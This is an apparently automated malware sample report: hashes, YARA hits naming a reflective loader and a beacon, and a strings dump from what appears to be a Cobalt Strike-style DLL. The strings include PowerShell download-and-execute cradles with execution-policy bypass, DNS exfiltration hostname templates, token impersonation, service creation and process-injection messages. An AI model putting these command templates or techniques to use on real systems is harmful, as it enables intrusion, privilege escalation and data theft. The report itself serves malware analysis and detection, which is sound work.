Sample details: 7ad18bb1c440e9905349be147811a960 --

Hashes
MD5: 7ad18bb1c440e9905349be147811a960
SHA1: 138cbc8caeef02a2019261606899d3b8073ced50
SHA256: 1e83a49c0c590cf141cd15cf69ba3a1f9eaf002c66ac911c86bb4802762964b6
SSDEEP: 3072:UgStcTn1twGbPUEl77skn1JfO1VgB9yT5OWfHQyomJrB/qVYJfjOsTVacFh:UgStyUJkn15rQT5OMw3mJrB/45WV5v
Details
File Type: MS-DOS
Yara Hits
YRP/IsPE64 | YRP/IsDLL | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/powershell | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/anti_dbg | YRP/inject_thread | YRP/create_service | YRP/network_http | YRP/network_dns | YRP/escalate_priv | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/Prime_Constants_long | YRP/RijnDael_AES | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/WiltedTulip_ReflectiveLoader | FlorianRoth/ReflectiveLoader | FlorianRoth/Beacon_K5om |
Strings
		MZARUH
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
t$ WATAUAVAWH
 A_A^A]A\_
WAVAWH
 A_A^_
x ATAVAWH
0A_A^A\
@SUVWAVAWH
XA_A^_^][
WATAUAVAWH
 A_A^A]A\_
WATAUAVAWH
|$(!D$ 
A_A^A]A\_
\$ UVWATAUAVAWH
A_A^A]A\_^]
x UATAUAVAWH
A_A^A]A\]
N,+~(I
WATAUAVAWH
 A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
0A_A^A]A\_
SUVWATAUAVAWH
HA_A^A]A\_^][
H SUVWH
` UAVAWH
@A_A^]
UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
 A_A^A]A\_^]
|$ UATAUAVAWH
A_A^A]A\]
t$ UWAVH
<+t*<-t)
t$ WATAUAVAWH
u"9D$XH
 A_A^A]A\_
WAVAWH
 A_A^_
UAVAWH
9|$ t8L
UVWATAUAVAWH
A_A^A]A\_^]
9|$ t4L
WATAUAVAWH
 A_A^A]A\_
WAVAWH
 A_A^_
H SVWH
` UAVAWH
u 9D$8t
UAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
UAVAWH
UVWATAUAVAW
A_A^A]A\_^]
@USVWATAUAVAWH
L$0u%H
A_A^A]A\_^[]
@USVWATAUAVAWH
T$8u%H
A_A^A]A\_^[]
` UAVAWH
UVWATAUAVAWH
A_A^A]A\_^]
` UAVAWH
WATAUAVAWH
A_A^A]A\_
UAVAWH
D9t$P~
UAVAWH
@A_A^]
WAVAWH
 A_A^_
WATAUAVAWH
A_A^A]A\_
@SUVWATAUAVAWH
A_A^A]A\_^][
WATAUAVAWH
f;D$ w
f;D$"w
t$ WAVAWH
 A_A^_
WAVAWH
0A_A^_
@USVWATAUAVAWH
A_A^A]A\_^[]
WAVAWH
 A_A^_
WAVAWH
~8H!|$(H
@A_A^_
UVWAVAWH
A_A^_^]
UVWAVAWH
A_A^_^]
UVWATAUAVAWH
A_A^A]A\_^]
USVWATAUAVAWH
t$0D!l$(D
A_A^A]A\_^[]
t$ UWAVH
\$ UVWATAUAVAWH
A_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
A_A^A]A\_^]
l$ VWAVH
t$ UWAVH
L$8H!t$ L
@SUVWATAVAW
A_A^A\_^][
UATAUAVAWH
A_A^A]A\]
l$ VWAVH
;T$(}#C
x Hct$(E3
@SUVWATAVAWH
A_A^A\_^][
\$ UVWAVAWH
A_A^_^]
Hcl$pL
UVWATAUAVAWH
pA_A^A]A\_^]
` UAVAWH
l$ VWAWH
system32L
\$ UVWH
\$ UVWAVAWH
A_A^_^]
t$ UWATAVAWH
A_A^A\_]
x ATAVAWH
fD9c8u
fD9{8u
 A_A^A\
uEf9o8u$H
b9\$0vX;
\$ UVWH
\$ UVWH
UVWATAVH
A^A\_^]
H !X H!X
UVWATAUAVAWH
`A_A^A]A\_^]
WAVAWH
 A_A^_
\$ UVWATAUAVAWH
A_A^A]A\_^]
l$ VWAVH
x UATAWH
\$ UVWH
UATAUAVAWH
A_A^A]A\]
@USVWATAUAVAWH
A_A^A]A\_^[]
|$ UAVAWH
uQHc}0I
\$ UVWAVAWH
A_A^_^]
x ATAVAWH
 A_A^A\
UVWATAUAVAWH
z HcG<L
t'IcG<
I+v0E9
 A_A^A]A\_^]
UVWAVAWH
A_A^_^]
WAVAWH
 A_A^_
WATAUAVAWH
A_A^A]A\_
@USVWAVH
A^_^[]
@SUVWAVH
PA^_^][
t$ WAVAWH
HcL$ H
HcL$ H
HcL$ H
D$0HcD$$H
L$ USVWH
WATAUAVAWH
@A_A^A]A\_
fffffff
UAVAWH
x ATAVAWH
D8&t4H
D8d$Ht
A_A^A\
|$ AVH
WATAUAVAWH
 A_A^A]A\_
L$ UVWATAUAVAWH
 A_A^A]A\_^]
t$ WATAUAVAW
A_A^A]A\_
A:8uiI
t"A88t
UVWATAUAVAWH
D$DD9T$\
|$h+t$D+
A_A^A]A\_^]
t$ WAVAWH
LcA<E3
ATAVAWH
 A_A^A\
WAVAWH
 A_A^_
VWATAVAWH
0A_A^A\_^
WATAUAVAWH
A_A^A]A\_
l$ VWATAVAWH
T$&@8t$&t9@8r
A81t@@8r
A_A^A\_^
Genuua
ineIuY
nteluQ3
UVWATAUAVAWH
D$DD9T$\
|$h+t$D+
A_A^A]A\_^]
WAVAWH
 A_A^_
VWATAVAWH
A_A^A\_^
AUAVAWH
0A_A^A]
|$ ;=R
VWAUAVAWH
0A_A^A]_^
VWATAVAWH
 A_A^A\_^
\$ UVWATAUAVAWH
!|$HHc
|$HD9l$X
HcD$LH;
HcD$LH;
H!|$ L
A_A^A]A\_^]
WATAUAVAWH
 A_A^A]A\_
USVWATAUAVAWH
8UXt#D
XA_A^A]A\_^[]
VWATAVAWH
 A_A^A\_^
VWATAVAWH
 A_A^A\_^
` AUAVAWH
t$8Hc0I
\$0D9=
A_A^A]
Hct$@H
sYHcL$HH
x ATAVAWH
< tD<	t@
 A_A^A\
H3E H3E
@USVWATAUAVAWH
A_A^A]A\_^[]
@SUVWATAVAWH
PA_A^A\_^][
@UATAUAVAWH
!t$(H!t$ I
A_A^A]A\]
@UATAUAVAWH
A_A^A]A\]
` AUAVAWH
0A_A^A]
D$(A9h
@8l$8t
r"fD;A
@8l$8t
D82u&H
D8t$Ht
UAVAWH
fD9|T@
C\f9DL@t
USVWATAUAVAWH
u@H9=!
t]+uoA;6rUA
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
 A_A^A]
UVWATAVH
0A^A\_^]
UVWATAUAVAWH
t8L9%o
0A_A^A]A\_^]
D9d$xttH
UVWATAUAVAWH
L$purL
0A_A^A]A\_^]
D9t$xtpH
@8t$8t
@8l$Ht
fD93tSH
CfD93u
@USVWATAUAVAWH
eHA_A^A]A\_^[]
HcD$hH
cdn.%x%x.%s
www6.%x%x.%s
%s.1%x.%x%x.%s
%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x.%x%x.%s
%s.1%08x%08x.%x%x.%s
%s.1%08x.%x%x.%s
api.%x%x.%s
unknown
could not run command (w/ token) because of its length of %d bytes!
could not spawn %s (token): %d
could not spawn %s: %d
could not run %s as %s\%s: %d
COMSPEC
could not upload file: %d
could not open %s: %d
could not get file time: %d
could not set file time: %d
127.0.0.1
Could not connect to pipe (%s): %d
Could not open service control manager on %s: %d
Could not create service %s on %s: %d
Could not start service %s on %s: %d
Started service %s on %s
Could not query service %s on %s: %d
Could not delete service %s on %s: %d
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeUnsolicitedInputPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege
Could not create service: %d
Could not start service: %d
Failed to impersonate token: %d
Failed to get token
IsWow64Process
kernel32
Could not open '%s'
D	0	%02d/%02d/%02d %02d:%02d:%02d	%s
F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
could not allocate %d bytes in process: %d
could not write to process memory: %d
could not create remote thread in %d: %d
could not open process %d: %d
%d is an x64 process (can't inject x86 content)
%d is an x86 process (can't inject x64 content)
sysnative
RtlCreateUserThread
ntdll.dll
process
Could not connect to pipe: %d
%d	%d	%s
Kerberos
kerberos ticket purge failed: %08x
kerberos ticket use failed: %08x
could not connect to pipe: %d
could not connect to pipe
Maximum links reached. Disconnect one
%d	%d	%d.%d	%s	%s	%s	%d	%d
Could not bind to %d
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
%%IMPORT%%
Command length (%d) too long
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
powershell -nop -exec bypass -EncodedCommand "%s"
?%s=%s
%s&%s=%s
%s%s: %s
Could not kill %d: %d
%s	%d	%d
%s	%d	%d	%s	%s	%d
hmac_calculate
decrypt/cbc_start
decrypt/cbc_decrypt
decrypt/cbc_done
encrypt/cbc_start
encrypt/cbc_encrypt
encrypt/cbc_done
crypt_derive
abcdefghijklmnop
aes_setup
rsa_import
rsa_encrypt
could not create pipe: %d
I'm already in SMB mode
%s (admin)
Could not open process: %d (%u)
Could not open process token: %d (%u)
Failed to impersonate token from %d (%u)
Failed to duplicate primary token for %d (%u)
Failed to impersonate logged on user %d (%u)
Could not create token: %d
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: %d
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
,cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
uuuu				
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
RRRR				jjjj
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy    
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
}}}}cc
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
pp|B>>q
aaj_55
UUPx((
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
,4$8'9-6:.6$1#?*XhHpSeA~NrZlE
Sbt\lH
QeFbF~TiKwZ
4$8,9-6'.6$:#?*1hHpXeA~SrZlN
SbE\lHtQeF
F~TbKwZi
$8,4-6'96$:.?*1#HpXhA~SeZlNrSbE
lHt\eF
Q~TbFwZiK
8,4$6'9-$:.6*1#?pXhH~SeAlNrZbE
SHt\lF
QeTbF~ZiKw
"3DUfw
"3DUfw
"3DUfw
CorExitProcess
(null)
`h````
xpxxxx
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CreateSemaphoreExW
SetThreadStackGuarantee
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
GetLogicalProcessorInformation
CreateSymbolicLinkW
SetDefaultDllDirectories
EnumSystemLocalesEx
CompareStringEx
GetDateFormatEx
GetLocaleInfoEx
GetTimeFormatEx
GetUserDefaultLocaleName
IsValidLocaleName
LCMapStringEx
GetCurrentPackageId
`h`hhh
xppwpp
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
UNICODE
UTF-16LE
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
A cast to a smaller data type has caused a loss of data.  If this was intentional, you should mask the source of the cast with the appropriate bitmask.  For example:  
	char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
Stack memory was corrupted
A local variable was used before it was initialized
Stack memory around _alloca was corrupted
Unknown Runtime Check Error
Unknown Filename
Unknown Module Name
Run-Time Check Failure #%d - %s
Stack corrupted near unknown variable
Stack pointer corruption
Cast to smaller type causing loss of data
Stack memory corruption
Local variable used before initialization
Stack around _alloca corrupted
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
RegOpenKeyExW
RegQueryValueExW
RegCloseKey
PDBOpenValidate5
CreateFile2
Microsoft Base Cryptographic Provider v1.0
?456789:;<=
 !"#$%&'()*+,-./0123
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
sha256
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
LibTomMath
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
GetCurrentProcessId
GetLocalTime
GetTickCount
GetLastError
WaitForSingleObject
WriteFile
FlushFileBuffers
GetFileTime
SetFileTime
CloseHandle
CreatePipe
DisconnectNamedPipe
CreateProcessA
GetStartupInfoA
GetEnvironmentVariableA
SetCurrentDirectoryA
GetCurrentDirectoryA
GetCurrentDirectoryW
CreateFileA
GetProcAddress
GetCurrentProcess
CreateThread
GetCurrentThread
ReadFile
ConnectNamedPipe
GetModuleHandleA
CreateNamedPipeA
GetVersionExA
GetFullPathNameA
GetLogicalDrives
FindClose
SystemTimeToTzSpecificLocalTime
FileTimeToSystemTime
ExpandEnvironmentStringsA
GetFileAttributesA
FindFirstFileA
FindNextFileA
VirtualAllocEx
OpenProcess
CreateRemoteThread
WriteProcessMemory
FreeLibrary
SetLastError
CreateToolhelp32Snapshot
SetNamedPipeHandleState
PeekNamedPipe
WaitNamedPipeA
LocalAlloc
LocalFree
GetComputerNameA
TerminateProcess
ProcessIdToSessionId
Process32First
Process32Next
KERNEL32.dll
CreateProcessAsUserA
CreateProcessWithLogonW
CreateProcessWithTokenW
CloseServiceHandle
CreateServiceA
DeleteService
OpenSCManagerA
QueryServiceStatus
StartServiceA
ImpersonateNamedPipeClient
OpenProcessToken
OpenThreadToken
AdjustTokenPrivileges
LookupPrivilegeValueA
ImpersonateLoggedOnUser
ControlService
OpenServiceA
QueryServiceStatusEx
GetUserNameA
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
RevertToSelf
GetTokenInformation
AllocateAndInitializeSid
FreeSid
LookupAccountSidA
LogonUserA
DuplicateTokenEx
CheckTokenMembership
ADVAPI32.dll
InternetOpenA
InternetCloseHandle
InternetConnectA
InternetReadFile
InternetQueryDataAvailable
InternetQueryOptionA
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
WS2_32.dll
DnsFree
DnsQuery_A
DNSAPI.dll
GetIfEntry
GetIpAddrTable
IPHLPAPI.DLL
LsaLookupAuthenticationPackage
LsaCallAuthenticationPackage
LsaConnectUntrusted
Secur32.dll
EncodePointer
DecodePointer
ExitProcess
GetModuleHandleExW
AreFileApisANSI
MultiByteToWideChar
HeapFree
HeapAlloc
IsDebuggerPresent
IsProcessorFeaturePresent
GetCommandLineA
GetCurrentThreadId
GetSystemTimeAsFileTime
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetStartupInfoW
GetModuleHandleW
GetStdHandle
GetModuleFileNameW
LoadLibraryExW
RtlUnwindEx
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetProcessHeap
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
ReadConsoleW
SetFilePointer
SetFilePointerEx
GetFileType
DeleteFileW
CreateDirectoryW
RemoveDirectoryW
GetModuleFileNameA
QueryPerformanceCounter
GetEnvironmentStringsW
FreeEnvironmentStringsW
RaiseException
LoadLibraryW
OutputDebugStringW
HeapSize
HeapReAlloc
CompareStringW
LCMapStringW
GetStringTypeW
SetStdHandle
WriteConsoleW
VirtualQuery
CreateFileW
SetEndOfFile
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
SetEnvironmentVariableA
SetEnvironmentVariableW
fb7e25.x64.dll
ReflectiveLoader
D$$[[aYZQ
6QQh8h
AQAPRQVH1
AXAX^YZAXAYAZH
ihihikiiikihiki9ijikimii
	imikimiyiiilihikiiioihiki
inijhiY
dhhhlij
Fkjhihiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiaijhi
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii`iji
F\GYIA
RI$: ,IXYGYRI>
I'=I_G[RI>&>_]RI=
F_GYRI=
RI$(%*#:@iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiciji)F
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiibijhiiiimiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiieijhiiiiniiiiiiijiiioiiio*
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiidijhiiiiciiiO*
iiiniiiiiiiliiik
iiiniiihiiimiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiitiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiwiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiifiji
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiivihikihizikimiiiii}ikimiiiiisijiy.,=iiiiiiiiiiiiiirijiy9&:=iiiiiiiiiiiiiuikimiiiiiyihikiiixihikiii{ihikiiii
rijndael
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>